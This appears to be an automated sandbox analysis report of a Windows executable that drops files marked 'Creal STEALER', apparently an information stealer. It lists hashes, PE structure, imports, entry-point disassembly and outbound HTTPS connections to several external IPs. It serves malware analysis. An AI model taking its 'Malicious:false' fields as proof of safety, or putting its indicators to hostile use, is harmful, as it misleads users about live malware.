                                                                                                                                                                                                                                                      SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                                                                                                                      MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                                                                                                                      SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                                                                                                                      SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                                                                                                                      SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1138040
                                                                                                                                                                                                                                                      Entropy (8bit):5.434701276929729
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                                                                                                                      MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                                                                                                                      SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                                                                                                                      SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                                                                                                                      SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                      Entropy (8bit):3.9783335811852645
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:vgt2TO1ng2DIIbr:FO1g2D1v
                                                                                                                                                                                                                                                      MD5:155EA3C94A04CEAB8BD7480F9205257D
                                                                                                                                                                                                                                                      SHA1:B46BBBB64B3DF5322DD81613E7FA14426816B1C1
                                                                                                                                                                                                                                                      SHA-256:445E2BCECAA0D8D427B87E17E7E53581D172AF1B9674CF1A33DBE1014732108B
                                                                                                                                                                                                                                                      SHA-512:3D47449DA7C91FE279217A946D2F86E5D95D396F53B55607EC8ACA7E9AA545CFAF9CB97914B643A5D8A91944570F9237E18EECEC0F1526735BE6CEEE45ECBA05
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<--Creal STEALER BEST -->....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                      Entropy (8bit):3.9783335811852645
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:vgt2TO1ng2DIIbr:FO1g2D1v
                                                                                                                                                                                                                                                      MD5:155EA3C94A04CEAB8BD7480F9205257D
                                                                                                                                                                                                                                                      SHA1:B46BBBB64B3DF5322DD81613E7FA14426816B1C1
                                                                                                                                                                                                                                                      SHA-256:445E2BCECAA0D8D427B87E17E7E53581D172AF1B9674CF1A33DBE1014732108B
                                                                                                                                                                                                                                                      SHA-512:3D47449DA7C91FE279217A946D2F86E5D95D396F53B55607EC8ACA7E9AA545CFAF9CB97914B643A5D8A91944570F9237E18EECEC0F1526735BE6CEEE45ECBA05
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<--Creal STEALER BEST -->....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                      Entropy (8bit):0.4393511334109407
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                                                                                                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                                                                                                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                                                                                                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                                                                                                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.983563715699599
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:322pVOVprx.exe
                                                                                                                                                                                                                                                      File size:13686532
                                                                                                                                                                                                                                                      MD5:b051bbe6f5678560e4594b4c65cca682
                                                                                                                                                                                                                                                      SHA1:3a19952dbe209eebf642fb0ad7e2e681b5fe8ea1
                                                                                                                                                                                                                                                      SHA256:b76165845798adbba7f4070b2e4543e8fbfc9a0282273bd791f39619eee19770
                                                                                                                                                                                                                                                      SHA512:f0e19683f7948774a2aceef72f0de8f27cb4721f9f25cd7f8ea7c988daf63f48d4ebdeb6998fe2a721f776f1decbc94313f1c03dfb411645c97c7e8674286614
                                                                                                                                                                                                                                                      SSDEEP:393216:TEu7L/xvdqNdQJluIF3MnG3xl56BaW00TLlSpnpK2:TECLpVgdQt3MGx6P01
                                                                                                                                                                                                                                                      TLSH:4DD6334693260CE5E7265032F476E620F632ACA54BB0D6164364F2A13E77EA0FD3EF54
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6_..W1..W1..W1../2..W1../4.)W1../5..W1..+...W1..+4..W1..+5..W1..+2..W1../0..W1..W0..W1.W+5..W1.W+3..W1.Rich.W1.........PE..d..
                                                                                                                                                                                                                                                      Icon Hash:d02fd8d2d6629920
                                                                                                                                                                                                                                                      Entrypoint:0x14000b310
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x63E99A29 [Mon Feb 13 02:02:17 2023 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:2
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:2
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:2
                                                                                                                                                                                                                                                      Import Hash:0b5552dccd9d0a834cea55c0c8fc05be
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      call 00007F08D0C092CCh
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      jmp 00007F08D0C08EDFh
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      call 00007F08D0C09844h
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F08D0C09083h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                      jmp 00007F08D0C09067h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      cmp ecx, eax
                                                                                                                                                                                                                                                      je 00007F08D0C09076h
                                                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      cmpxchg dword ptr [0004121Ch], ecx
                                                                                                                                                                                                                                                      jne 00007F08D0C09050h
                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                                      jmp 00007F08D0C09059h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                                      movzx eax, byte ptr [00041207h]
                                                                                                                                                                                                                                                      test ecx, ecx
                                                                                                                                                                                                                                                      mov ebx, 00000001h
                                                                                                                                                                                                                                                      cmove eax, ebx
                                                                                                                                                                                                                                                      mov byte ptr [000411F7h], al
                                                                                                                                                                                                                                                      call 00007F08D0C09643h
                                                                                                                                                                                                                                                      call 00007F08D0C0A772h
                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                      jne 00007F08D0C09066h
                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                      jmp 00007F08D0C09076h
                                                                                                                                                                                                                                                      call 00007F08D0C16D51h
                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                      jne 00007F08D0C0906Bh
                                                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                                                      call 00007F08D0C0A782h
                                                                                                                                                                                                                                                      jmp 00007F08D0C0904Ch
                                                                                                                                                                                                                                                      mov al, bl
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 20h
                                                                                                                                                                                                                                                      pop ebx
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                                      cmp byte ptr [000411BCh], 00000000h
                                                                                                                                                                                                                                                      mov ebx, ecx
                                                                                                                                                                                                                                                      jne 00007F08D0C090C9h
                                                                                                                                                                                                                                                      cmp ecx, 01h
                                                                                                                                                                                                                                                      jnbe 00007F08D0C090CCh
                                                                                                                                                                                                                                                      call 00007F08D0C097AAh
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F08D0C0908Ah
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3bd0c0x78.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x422b0.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4e0000x20c4.pdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x950000x758.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x394800x1c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x393400x140.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x418.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x288000x28800False0.5583465952932098data6.488023200564254IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rdata0x2a0000x12b160x12c00False0.5154817708333334data5.824682035366569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x3d0000x103f80xe00False0.13309151785714285DOS executable (block device driver \377\3)1.8096886543499544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .pdata0x4e0000x20c40x2200False0.47794117647058826data5.274096406482418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      _RDATA0x510000x15c0x200False0.384765625data2.808567494642619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rsrc0x520000x422b00x42400False0.020187205188679246data2.4244234410032606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x950000x7580x800False0.544921875data5.2576643703968475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                      RT_ICON0x520e80x41c28Device independent bitmap graphic, 255 x 512 x 32, image size 261120, resolution 7501 x 7501 px/m
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x93d100x14data
                                                                                                                                                                                                                                                      RT_MANIFEST0x93d240x58aXML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                      COMCTL32.dll
                                                                                                                                                                                                                                                      KERNEL32.dllGetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                                                      ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                      GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.832434893 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.832496881 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.832585096 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.833720922 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.833745003 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.859714031 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.859785080 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.859884024 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.892417908 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.892483950 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.015371084 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.016290903 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.016320944 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.018040895 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.018146038 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.019213915 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.019221067 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.019377947 CET4434969051.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.019433975 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.022785902 CET49690443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.235829115 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.235866070 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.235955954 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.237185955 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.237202883 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.345884085 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.346575022 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.346611023 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.348372936 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.348488092 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.350167990 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.350179911 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.350265980 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.350393057 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.350403070 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.549547911 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.713187933 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.714090109 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.714169025 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.715401888 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.715826035 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.718074083 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.718086958 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.718195915 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.718441010 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.718451977 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.768299103 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.768328905 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.815064907 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.923717976 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.923806906 CET44349689104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.923866987 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.925626040 CET49689443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.067667007 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.067831993 CET44349691173.231.16.76192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.067935944 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.341336012 CET49691443192.168.2.5173.231.16.76
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.566687107 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.566764116 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.566849947 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.567867041 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.567895889 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.569211006 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.569281101 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.569382906 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.569816113 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.569852114 CET44349693159.89.102.253192.168.2.5
